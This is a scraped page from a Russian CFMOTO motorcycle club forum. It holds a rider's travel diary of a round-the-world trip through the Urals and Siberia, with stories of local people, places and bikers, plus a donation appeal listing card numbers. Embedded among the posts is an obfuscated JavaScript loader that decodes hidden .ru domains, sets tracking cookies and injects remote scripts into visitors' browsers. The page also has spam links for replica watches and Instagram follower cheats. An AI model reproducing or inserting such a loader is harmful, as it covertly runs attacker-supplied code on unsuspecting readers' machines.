Дорогие квадроциклисты, мы создали этот сайт много лет назад для вашего живого общения, но, к сожалению, на сегодняшний день формат форумов стал не актуален.

Однако мы решили сохранить этот ресурс, что вы могли найти отзывы, мнения о технике и информацию о клубах CFMOTO, оставленные ранее. Мы в процессе разработки нового варианта клубного сайта.

А пока вы можете:

Перейти на сайт CFMOTO в России Остаться здесь
Пользователи  Правила 
x
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Форум » Пробеги и экспедиции
https://www.high-endrolex.com/8

Сообщение успешно добавлено.

Страницы: 1 2 3 4 5 След.
RSS
В КругоСветку на CFMOTO 650 TK, CFMOTO CFMOTOCLUB 650TK IZGEYUL
 


День, который так долго ждал и сотни раз представлял .
Спасибо всем тем, кто пришел, приехал! Очень был рад увидеться перед стартом с Вами снова.

И сразу хочу поблагодарить своих партнеров компании CFMOTO, Motul, за предоставление Мотоцикла расходников для Мотопробега и Уфимский Дилерский центр Салон Мототехники Extreme за организацию старта и за подарок- комплект термобелья ( в первую же ночь, которую провел в палатке понял на сколько нужная эта качественная вещь в Дороге )


Все увиденное буду выкладывать на своих страницах:
вконтакте:https://vk.com/izgeyul
фэйсбук:https://www.facebook.com/IzgeYul
инстаграмм:https://instagram.com/izgeyul/
Ютюб:http://izgeyul.com
Одноклассники: http://www.ok.ru/group/52739380478113
и на личном сайте:http://izgeyul.com

Всем желаю удачи !

До связи!

moto-magazine.ru superbike-magazine.ru #motul #UTV #moto #Trip#Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO #650TK#cfmotoclub#РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
Первый день в Дороге.

Едва выехал из Уфы, проехал всего километров 15 пошел дождь.

Пришлось сделать остановку, чтобы надеть дождевик, и мотобахилы.
Недалеко от места остановки стояла машина, с прилавка торговали медом.

Познакомился с торговцем, зовут Рифат Авзый (Дядя Рифат).
(К сожалению Он попросил не делать видео и фотосьемку .)

Он рассказал о себе, что раньше занимал высокие посты в различных государственных структурах, но потом решил уволиться и уехал жить в деревню, где занялся разведением пчел и производством меда.

От себя скажу, что Я живу в Республике, где мед является национальным брендом, также мой дедушка сам занимается его производством, но от нового знакомого узнал столько всего нового.

Я рассказал, что направляюсь во Владивосток, а по Пути заеду на Алтай, и давно слышал спор про то, какой мед вкуснее и полезнее: Башкирский или Алтайский?

На что Рифат Авзый выдал мне просто энцеклопедические данные с цифрами и фактами, рассказал о различных экспериментах, по которым можно с уверенностью сказать, что Башкирский Мед самый полезный. Сказал какие вопросы задать на Алтае, если там попытаются опровергнуть Его слова. Я же решил, что никого в неудобное положение ставить не буду, а просто попробую на вкус знаменитый Алтайский Продукт и расскажу Вам, свои впечатления

#БашкирскийМед #BashkortIle #Bashkortostan moto-magazine.ru superbike-magazine.ru #motul #UTV#moto #Trip #Путешествия #Юл #Мотоцикл#Путешествия #CFMOTO #650TK #cfmotoclub#РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
Первый отрезок это дорога из Уфы до озера Зюраткуль.

Чтобы доехать до этого места, нужно проехать около 240 км от Уфы через город Сим, до указателя, далее поворот на право, дорога 10 км с асфальтовым покрытием, и еще 15 км щебень, часто глиняные насыпи, передвигаясь после дождя на Двух колесах нужны быть особенно внимательным.

Дорога проходит по федеральной трассе М5.
Этот отрезок перегружен фурами , и вечно спешащими куда то водителями легковушек , каждый пятый из которых "гонщик".

Посты ДПС через каждые 50 км.

Пару раз замирало сердце , когда видел недалеко от себя, опасные маневры и встречным машинам приходилось самим выезжать на обочину, чтобы дать возможность завершить обгон.

Также на большегрузном транспорте зачастую элементарно не протерты стоп сигналы и указатели поворотов, в купе с горной местностью, дождем, сильным боковым ветром и частой колеёй, разбитыми краями дорожного полотна а также помня о том, что недавно на этой трассе разбился Сергей Михалев- бывший тренер хоккейного клуба Салават Юлаев,

Я решил держать дистанцию до 80 метров и двигался со скоростью не более 80 км/ч, местами и того медленнее. Один из моих принципов движения: "Тише едешь, дальше будешь, больше увидишь"

К тому же Я не собираюсь ставить рекордов в протяженности и времени прохождения маршрута, а тихо катить себе наслаждаясь видами и чувством,что Мечта сбывается!

Крайние три дня перед стартом были довольно напряженными:
нужно было все перепроверить, намотать километраж , чтобы в Уфе сделать первое ТО, было много встреч с журналистами, ради прямого эфира пришлось вставать в 3 и проехать около 300 км, чтобы успеть вовремя, так как накануне задержался из-за дорожных условий на Юге Республики,

К сожалению не успел встретиться со многими
Еще пришлось уже ночью перед стартом скататься в Раевку (120 км) за некоторыми пришедшими в голову вещами.

Благо меня привезли и отвезли, но дело было уже под утро и поспал перед стартом около 3 часов.

За неделю примерно до отъезда пропал аппетит, не хотелось ни пить , ни есть, и засыпал лишь под утро на пару часов.

Решил, что нужно отдохнуть от всех предстартовых волнений и первую ночь провести в палатке, желательно у воды. Заметил еще в прошлом году в Кыргызстане, что на меня успокаивающе действует шум прибивающихся к берегу волн в сочетании с шелестом листьев.

Поэтому выбор пал именно на озеро Зюраткуль.

Не только потому что, здесь хотел побыть в уединении, забегая вперед скажу, что полной тишины все же не было, рядом была группа девушек- предложили поставить палатку поближе к ним, Я выбрал место максимально дальнее.

Хочется рассказать немного о самом месте :

Зюраткуль - самое высокогорное озеро Европы...
А национальный парк, где оно расположено, - считается одним из самых красивых и популярных в России. Заповедник находится на стыке Европы и Азии. Это делает его животный и растительный мир уникальным.

Вьезд 40 рублей, палатку можно ставить беzплатно.

С озером связано много легенд. Одна из них гласит:

«В глубокую старину красавица Юрма, капризная невеста, в гневе разбила волшебное зеркало, подаренное ей богатырем Семигором.

Один маленький осколок улетел далеко в горы и превратился в прекрасное озеро, чистое, прозрачное, как слёзы прелестной девушки.

С тех пор это озеро, как магнит, как волшебство, притягивает к себе людей.

Побывав один раз, они оставляют здесь навсегда частицу своего сердца, своей души, а потом вновь стремятся на его берега, будто на свидание с любимой.

Не случайно озеро так и называется — Зюраткуль, что в переводе с башкирского значит «сердце-озеро».

Существует предание, что если умыться из рыбацкой лунки на озере Зюраткуль, надолго сохранишь молодость и красоту. Не случайно оно носит такое магическое название, а женщины, живущие на берегах Зюраткуля, долго не старятся.

Вот такое интересное место!

Всем Вечной Молодости!

#Zuratkul #Зюраткуль #Челябинск #Chelyabinsk #Travel #природа #motul #UTV #moto #Trip#Путешествия #Юл #Мотоцикл #Путешествия#CFMOTO #650TK #cfmotoclub #РишатСултанов #ИзгеЮл#RishatSultanov #IzgeYul
 
Знакомтесь Друзья!
Ли Ян из Китая .

В дороге уже 7 месяцев, выехал из Пекина и проехал Юго-Восточную Азию, далее двинул по России, сейчас направляется в Испанию.

Знакомство произошло при интересных обстоятельствах:
одновременно, подъехали к хостелу с названием DreamHouse . Он с конца улицы, Я с начала.

Еще одно совпадение, у нас есть общий знакомый Олег(МотоПутешественник, КругоСветчик из Москвы) с которым Они познакомились в Лаосе.

Хоть и в позднее время заселились в номер, но проговорили еще очень долго на ломанном Английском.

Вначале Он удивился, что у меня небольшой багаж, потом удивился еще сильнее, когда из своей сумки Я вытащил вещей больше, которые по Его мнению туда бы не вместились .

На следующий день Он попросил довести Его до столовой, и помочь выбрать блюда, так как на Русском Он не говорит, а Английским у нас владеют единицы. Также на заправке понадобилась моя помощь.

За завтраком, Он научил меня нескольким Китайским словам, Я Его Башкирским.

Сказал, что в Китае мое имя будет звучать Ли Шаа Т

Интересно, Англичане и англоговорящие обращаются ко мне Richert,
Немцы и Австрийцы Rihard а теперь и
на Китайском есть вариант Li Shaa T

Как узнал что Я Bashkort (Башкир), то сразу залез в интернет и очень долго и внимательно изучал имеющуюся информацию, потом сам показал, что в Китае есть Синьзян-Уйгурский автономный округ(Восточный Туркестан), где проживают 9 миллионный родственный нам по Языку, Религии народ Уйгуры.

Предложил мне посетить Китай и сказал, что выделит Мотоцикл, так как в Его стране разрешении на передвижение в течении 10 дней стоит 3500 долларов США.

Ли Яну 27 лет, женат, в планах после Европы, проехать по Африки.
Сейчас Он движется через Уфу-Н.Челны-Н.Новгород на Москву, куда прилетела Его супруга и будет ждать встречи.

Мы обменялись контактами, потом Я немного проводил Его в направлении Уфы.

Если увидите Его на Дороге, то помогите советом, делом.
Он отличный парень, с добрыми намерениями!

До связи!

#ЛиЯн #Китай #Уйгуры #Bashkort #meetingIzgeYul #Челябинск #Chelyabinsk #Travel #природа #motul#UTV #moto #Trip #Путешествия #Юл#Мотоцикл #Путешествия #CFMOTO #650TK #cfmotoclub#РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
На пути в Екатеринбург случайно познакомился с Байкером из Челябинского МотоКлуба "Wings".

Зовут Андрей, направлялся на мероприятие посвященное 5-летию образования АМУ (Ассоциации Уральских Мотоклубов). Предложил поехать с ним.

Пропустить такое серьезное мероприятие Я разумеется не мог.

Там меня познакомили с представителями различных МотоДвижений и дали контакты ребят, у кого можно будет остановится в следующих городах, либо, если потребуется обратиться за помощью.

Теперь Я уже буду двигаться с поддержкой со стороны различных Российских МотоКлубов.

А сегодня меня заселили с огромной душой человеку по прозвищу "Борода"

Оказалось, что Василий(Борода), тоже лично знаком с Анной Гречишкиной (КругоСветчица из Украины). Как же тесен Мир. Все друг друга знают .

Сейчас Я в Екатеринбурге, тут пробуду до понедельника, потом двину на Шадринск-Тюмень - Тобольск и далее на Восток.

Всем отличных выходных !

До Связи !

#meetingIzgeYul #AMU #АМУ #Челябинск #Chelyabinsk #Travel #природа #motul #UTV #moto #Trip#Путешествия #Юл #Мотоцикл#Путешествия #CFMOTO #650TK #cfmotoclub #РишатСултанов #ИзгеЮл#RishatSultanov #IzgeYul
 
Помощь Проекту или открытка от МотоПутеШественника

Если Вы хотите помочь Проекту, то это можно будет сделать путем перевода на один из перечисленных ресурсов.

Я же в свою очередь пока могу отблагодарить Вас лишь добрым словом или открыткой с того места где буду находиться, высылайте адрес .

Помочь проекту можно путем перевода
на счет Qiwi кошелек:

89050072292

———————————————————

Либо на рублевую карту Альфа Банка:

на имя Rishat Sultanov

5486732507838076

———————————————————

На рублевую карту Сбербанка

на имя Zukhra Isanbaeva

5469060011971097

———————————————————-

На долларовую карту Сбербанка

на имя Zukhra Isanbaeva

4276060017144372

#Travel #природа #motul #UTV #moto #Trip #Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO#650TK #cfmotoclub #РишатСултанов#ИзгеЮл #RishatSultanov #IzgeYul

 
Каждый понимает, что любое начинание, тем более если это связано со смелыми, возможно авантюрными идеями сопровождается критикой или противодействием.

Второе Я не особо ощутил, но первое (критика) иногда всплывает. И если честно, то это лишь придает дополнительный стимул двигаться дальше, только вперед.

Пару дней назад состоялся разговор с одним мужчиной лет 40-45, который интересовался моим и Ли Яна МотоПробегом, Я живо с горящими глазами Ему рассказывал о планах, о прошлых поездках, человек внимательно слушал и задавал вопросы.

Я заметил, что Он немного не в духе, не скорбь, а печаль в глазах. Мне хотелось зажечь, ободрить Его.

Да и когда вижу подобное состояние, хочется в буквальном смысле растрясти, взбодрить человека.

Короткая, но живая беседа прошла в полном позитива ключе.
Потом пожелал спокойной ночи, и только завернул за угол, Он наверное решил, что Мы уже далеко ушли, Я услышал кучу негатива в свой и моего нового товарища адрес, от человека, перед которым только что искренни распинался.

и самая безобидная фраза: "Да (мат) ..ли, мажоры, Я бы тоже путешествовал, если бы были деньги..."

Ни сколько не задели Его слова, просто стало жалко потраченного времени, дело было уже позднее,
и лучше бы Я раньше лег спать.

Наверное, многие думают, что надобно кучу денег, чтобы отправиться в ПутеШествие.

А ведь иногда, для этого достаточно отказаться от ненужных трат.

Посчитаем финансы на Его примере.

Я обратил внимание, что два дня пока Я там был, он покупал по два, двухлитровых баллона пива.

Примерная стоимость 120-150 рублей, за вечер 240-300 рублей. В месяц 7200-9000.

За год 86 400- 108 000 рублей и это только на пиве, Я не считал сигареты, выкуриваемые по одной , через каждые полтора- два часа.

Для кого то пиво, для кого то последняя модель яблфона.

Кстати, на 108 000 можно даже в Латинскую Америку слетать туда,пожить, погулять и вернуться обратно.

Вывод напрашивается сам собой...

#Travel #природа #motul #UTV #moto #Trip #Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO#650TK #cfmotoclub #РишатСултанов#ИзгеЮл #RishatSultanov #IzgeYul
 
Всем привет!

Вчера немного пришлось задержаться в ЕКб и
выехать позднее чем планировал.

В итоге пробка на выезде, двинулся в направление Шадринска,был сильный дождь, встал на ночлег недалеко от трассы рядом с дальнобойщиками.

Вчера был реально один из тех дней, после которого бы девушки, которые напрашивались ранее на совместное путешествие собрали бы рюкзак и укатили бы прочь обратно.

Ночное движение, проливной дождь, плохая дорога и ветер.

Так пока складывается, что когда еду, то обязательно идет дождь , благо Мотоцикл надежен и нужно лишь грамотно рулить

Пока немного стихла непогода решил заночевать на небольшом кемпинге.

Только стал устанавливать палатку предательски дождь начался с новой силой.

Да так,что и дождевик не помог, пока вертел и крутил палатку через рукава проникла во внутрь вода в итоге вымок до нитки.

Пришлось уже в таком состоянии устанавливать палатку сопротивляясь ветру. Тентом разумеет не накрыть,
пока не установить каркас. В итоге в палатке литров 15-20 воды, поднимаю, наклоняю , чтобы слить воду, палатка разбирается и так несколько раз, а все дело происходит ночью при сильном ветре.

Походу дела себя подбадриваю словами:
"Мы идём к Мечте!Мы живём Мечтой! Мы знаем чего хотим и куда движемся! Да что нам дождь, когда в уме такие цели!

В борьбе с дождём и ветром, установил таки свой переносной домик..

Благо есть комплект сменного белья, который убрал в непромокаемый пакет.
Переоделся лег спать.

В такие моменты ещё больше ценишь такие простые вещи как теплую сухую постель и кровать.

Встал в 5 утра, познакомился с дальнобойщиком Виктором из Омска,
Он угостил горячим пловом и вкусным чаем.

Отличное утро

Всем доброго утра!
И отличного дня!

#motul #UTV #moto #Trip #Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO #650TK #cfmotoclub#РишатСултанов #ИзгеЮл#RishatSultanov #IzgeYul

 
В Екатеринбурге Я не ходил как люблю по музеям, больше старался пройти по городу пешком и постараться проникнуться местом.

Интересно было бы залезть на крышу небоскреба Высоцкий, но вход 500 рублей, посчитал, сразу прикинул в бензиновом эквиваленте -на эти деньги можно проехать примерно 350 км Пути .

Столица Урала у меня ассоциируется не с достопримечательностями и другими событиями города, а с отличными ребятами с которыми был рад познакомится и пообщаться! В первую очередь с Василием по прозвищу Борода, настоящим фанатом МотоТехники и МотоСтранствий у которого жил два дня и услышал десятки интересных дорожных историй и набрался полезной информации о маршруте на Владивосток.

Также в этом городе заехал в Азимут66, это дилерский центр CFMOTO, где меня отлично встретили, провели плановую чистку воздушного фильтра и даже доукомплектовали мою экипировку наиболее подходящими для движения под дождем перчатками, а то тем старым пошел уже 5-й сезон и с
дождем они справляться стали заметно хуже .

Незадолго до выезда из города приехали журналисты Вести-Урал, невероятно позитивными оказались ребята. Мне показалась, что под прицелом Их камеры Я проехал пол города как минимум . Несмотря на непрекращающийся дождь отлично пообщались_

#Azimut66.ru #Азимут66.ру #Екатеринбург #Ekaterinburg #Челябинск #Chelyabinsk #Travel #природа#motul #UTV #moto #Trip #Путешествия#Юл #Мотоцикл #Путешествия #CFMOTO #650TK #cfmotoclub#РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
Многие заметили, что мой маршрут пролегает не только по крупным мегаполисам, но также на Пути лежат города во много раз меньшие, но не менее интересные. Один из таких населенных пунктов город Далматово в Курганской области.

Мое внимание этот населенный пункт привлек тем, что здесь находится Свято-Успенский Мужской Монастырь,основанный еще в 1644 году, одним из прямых потомков дружины Ермака.

На территории монастыря находятся три храма (Собор Успения Пресвятой Богородицы, Церковь иконы Божьей Матери «Всех Скорбящих Радость», церковь Иоанна Богослова) и часовня. Сейчас в монастыре, как и в прежние времена, живут монахи, идут церковные службы, здесь есть кузница, столярная и швейная мастерские.

Интересна и история Монастыря. За время своего существования подвергавшиеся различным испытаниям: поджогам, набегам, были и осаждения в течении долгого времени. И многих исследователей заинтересовал вопрос: как смогли монахи продержаться будучи отрезанными от внешнего мира в течении долгого времени?

На этот счет существуют как мифы так и рассказы очевидцев о том, что под Монастырем находится целая сеть подземных ходов, через которое монахи могли выходить из осажденной территории и пополнять запасы еды и воды.

Со временем некоторые сооружения обветшали, сейчас идут восстановительные работы, но по сей день здесь ведут службу монахи.

Был очень рад воочию увидеть это место и еще больше загорелось желание изучать историю России, места и людей, которые живут в Нашей необъятной Стране.

Далматово.Курганская область. Россия_

#Dalmatovo #Даламтово #Курганскаяобласть #Россия #Russia #Travel #природа #motul #UTV #moto#Trip #Путешествия #Юл #Мотоцикл#Путешествия #CFMOTO #650TK #cfmotoclub #РишатСултанов#ИзгеЮл #RishatSultanov #IzgeYul

 
Сейчас Я в славном городе Тюмени .

Здесь меня приютил Тюменский Байкерский Клуб "Сибирские Ястребы".

Если Они позволят, Я бы хотел показать Вам Их Байк-Пост - штаб, дом, не знаю как правильно назвать. Вообщем то место, где Они собираются, где принимаю гостей, где мне выделили место.

Тут большой дом с большими деревянными столами, резными стульями с символикой Клуба, вместительным гаражом. Словом, очень серьезно ребята к своему Клубу относятся и принимают активное участие в жизни города! Они Молодцы !!

Огромно спасибо ребятам за всевозможную поддержку.

С утра мне организовал познавательную и очень интересную экскурсию по городу Олег (Фармацевт).

Спасибо Челябинскому Мото-Клубу "Wings" и лично Андрею, байкеру с которым случайно познакомился на заправке и который свел меня с президентом Сибирских Ястребов.

А на сегодня запланирован визит в местное представительство CFMOTO а вечером встреча с телеканалом, где расскажу о МотоПробеге и о Родной Республике

#Тюмень #СибирскиеЯстребы #Tyumen #SiberianHawks #Wings #Travel #природа #motul #UTV #moto#Trip #Путешествия #Юл #Мотоцикл#Путешествия #CFMOTO #650TK #cfmotoclub #РишатСултанов#ИзгеЮл #RishatSultanov #IzgeYul
 
Один день в городе Тюмень

Чуть больше суток провел в этом городе, но приятных эмоций и впечатлений получил в разы больше, чем за некоторые дни и недели дома.

А все потому, что было много интересных знакомств, обзорная экскурсия по городу, которую устроил Олег - очень эрудированный человек, знающий на отлично историю города и Родного Края, от которого узнал много нового, плюс повезло с погодой и вдобавок на интервью журналист местного телеканала Ирина подарила сувенир с изображением кода области .

Хочу сказать огромные слова благодарности Сергею и Олегу ребятам из Байкерского Клуба Сибирские Ястребы, Тюменскому представительству CFMOTO и журналистам Тюменского телеканала за интересное общение и необычное интервью - в первый раз Я под прицелом камеры ходил и приставал к людям с вопросами, благо большинство приветливы и мне было не сложно .

Немного опаздывал на запись репортажа, включил навигатор-не сработал , спросил дорогу у водителя автомобиля, Он сказал:
-Давай Я Тебя провожу, езжай за мной!

Так и добрался с помощью местного жителя до нужного места

Словом, один сплошной позитив о городе и людях

#Тюмень #СибирскиеЯстребы #Tyumen #SiberianHawks #Wings #Kazakhstan #Almaty #Казахстан#Алматы #Travel #природа #motul #UTV #moto#Trip #Путешествия #Юл #Мотоцикл #Путешествия#CFMOTO #650TK #cfmotoclub #РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
Из города проводил до направления на Тобольск. Олег из Мото Клуба Сибирские Ястребы

#Тюмень#СибирскиеЯстребы#Tyumen#SiberianHawks#Wings#Kazakhstan#Almaty#Казахстан#Алматы#Travel#природа#motul#UTV#moto#Trip#Путешествия#Юл#Мотоцикл#Путешествия#CFMOTO#650TK#cfmotoclub#РишатСултанов#ИзгеЮл#RishatSultanov#IzgeYul
 
Едва Я выехал из Тюмени в направлении Тобольска.
Дорога отличная- две полосы в каждую сторону.

И тут при перестроении в меня чуть ни вьехал водитель "Приоры". Я быстро среагировал вильнул влево просигналил и поехал дальше.

Через пару километров Он меня обогнал и что то громко в мой адрес выкрикнул.

Мне показалось, что-то плохое издалось из Его уст. Я толком не разобрал, лишь увидел двух здоровых мужиков на переднем сиденье.

Далее Он начал притормаживать впереди меня, и показал левый указатель поворота.

Я решил, что Они хотят поговорить. Думаю : " Ну хорошо, к любым событиям готовы."

Подумал еще, что если будет драка, неплохо было бы заснять на камеру.

Настроился, что может быть битва.
Замедлил скорость, жду пока Они остановяться, чтобы остановиться позади.

Но Они лишь медленно едут, и включили "аварийку".

Я на расстоянии выхожу на соседнюю полосу- на расстоянии, потому что ожидаю, что меня могут ударить в бок
Ровняюсь с машиной, Они что то кричат и улыбаются.

Думаю, что за бред?! Тут только что чуть авария не произошла , а Они улыбаются, или тут так принято перед дракой и выяснением отношений?!

Чуть ближе подъезжаю к машине Они продолжают улыбаться, и слышу:

"Братаааан! Извенииии! Тебя не увидел. Езжай впереед!Извени, давай счастливого пути!

Сразу весь негатив сдуло встречным ветром и стало как то не ловко, что плохо подумал об этих людях

Мдааа, тут даже возможные дорожные конфликты, решаются таким образом

#Тюмень #Табол #Табольск #Tabol #Tabolsk #СибирскиеЯстребы #Tyumen #SiberianHawks #Almaty#Travel #природа #motul #UTV #moto #Trip#Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO#650TK #cfmotoclub #РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
"Ты еще Россию не проехал, а уже без штанов остался"

Так сказала Мама, когда узнала, что Я потерял свои джинсы, МотоЧерепаху, МотоШорты, пару теплых вещей и самое обидное чехол от дождя на Мотоцикл.

А потеря произошла, когда после движения под проливным дождем, Я сменил вещи на сухие, а уже промокшую одежду и защиту не смог высушить, убрал в отдельный пакет, чтобы постирать и высушить когда буду в помещении. Но этим планам не суждено было сбыться так как на одном из перегонов
все эти вещи у меня слетели с Мотоцикла ...

Сейчас Я нахожусь в городе Лянтор, в гостях у Мамы. Пока высыпался после долгой дороги, у меня появились новые джинсы

#Лянтор #Lyantor #Travel #природа #motul #UTV #moto #Trip #Путешествия #Юл #Мотоцикл#Путешествия #CFMOTO #650TK #cfmotoclub#РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
 
Я нахожусь сейчас в городя Лянтор.
Зашел вчера в уборную, она тут общая на этаже.
Переписываюсь с товарищем из Уфы и вот диалог из вчерашней переписки.

Товарищ спрашивает:
- Сургут будешь проезжать?
Я отвечаю:
- Через пару дней проеду.
- А сейчас где?
- Я в Лянторе.
- Что?! В Лянторе?
- Да.
- Я тоже в Лянторе! Ты в каком районе города?
- В 7 микрарайоне.
- В 7 ? ! Я тоже в седьмом!
- В каком доме?
- Я отвечаю в 27 и думаю, если Он тоже, то скажу, чтобы заходил в туалет. Думаю, вот так будет совпадение .

Но Он в доме по соседству, назначили встречу на следующий день

С утра встретились, поехали по городу, ребята свозили в этнографический музей, где представлена богатая экспозиция посвященная народу Ханты, там же есть чучела животных и рыб, которые водятся в местных лесах и реках, некоторые виды Я увидел впервые в Жизни

Потом поехали на улицу Салавата Юлаева. Для нас это улица сама по себе достопримечательность, достали Башкирский Флаг, сделали пару общих фото, затем направились на реку Пим.

Оказывается город Лянтор был основан благодаря стараниям Назаргалеева Мухтара, уроженца города Ишимбай, Республики Башкортостан. Именно Он открыл Лянторское месторождение нефти, а потом доказал целесообразность добычи сырья, и лично проектировал дома и целые улицы для нового города, который был построен для жилья и работы нефтяников.

В честь Назаргалеева Мухтара Бахтиганеевича названы Назаргалеевское нефтегазовое месторождение, открытое в 1996 году, и главная улица города Лянтор.
Занесён (посмертно) в Книгу Почёта Сургутского района (1999), Книгу Почёта и Памяти города Лянтора (2002).
Ежегодно в Сургутском районе проводится Мемориал памяти М. Б. Назаргалеева.
В октябре 2007 года открыта мемориальная доска памяти М.Б. Назаргалеева.

Очень интересно провели сегодняшний день, приятно было встретиться с друзьями в дали от дома и спасибо Им за прекрасно проведенное время !

#Лянтор #Lyantor #Ishimbai #Ишимбай #Travel #природа #motul #UTV #moto #Trip #Путешествия #Юл#Мотоцикл #Путешествия #CFMOTO#650TK #cfmotoclub #РишатСултанов #ИзгеЮл #RishatSultanov#IzgeYul
 
TV Тюмени про МотоПробег:

https://vk.com/izgeyul?w=wall-72040879_1345
 
В журнале Мото, за август 2015 вышла моя заметка по прошлогодней поездке на Мотоцикле по странам Средней Азии.
Кстати, журнал Мото является информационным партнером моего МотоПробега

#pressaIzgeYul #Travel #природа #motul #UTV #moto #Trip#Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO#650TK #cfmotoclub #РишатСултанов #ИзгеЮл#RishatSultanov #IzgeYul
 
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10029",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("cfmoto-club.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
Немного фото народа Ханты (взято с интернета.)

В места, где Они живут доехать не получилось ?? - нужна спецтехника, либо упряжка оленей ??.

Был еще вариант взять гида, получилось бы что - то вроде экскурсии, но цена 4 тысячи с человека, и нужно 4 или 5 человек в группе минимум.

Если нет хард-эндуро, квадроцикла или упряжки оленей, а познакомится с культурой местного населения очень хочется, то можно совершить ознакомительную экскурсию в Лянторский Хантыйский этнографический музей

Телефон: (34638) 20-440

Адрес: 628449, Тюменская область, Ханты-Мансийский автономный округ - Югра, г. Лянтор, мкр. Эстонских дорожников, строен. 50 (скрыть карту)

Проезд: Автобус "Сургут - Лянтор"

Режим работы:* Ежедневно с 10.00 до 18.00, выходной - понедельник

Входная плата:* Взрослый - 45 руб., детский - 22 руб., для иностранных граждан с экскурсией - 155 руб.,также есть льготы для студентов очной формы обучения.

#Ханты #Hanty #Lyantor #Лянтор #Travel #природа #motul #UTV #moto #Trip #Путешествия #Юл #Мотоцикл #Путешествия #CFMOTO #650TK #cfmotoclub #РишатСултанов #ИзгеЮл #RishatSultanov #IzgeYul
Страницы: 1 2 3 4 5 След.

Сообщение успешно добавлено.

Читают тему (гостей: 2)
instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi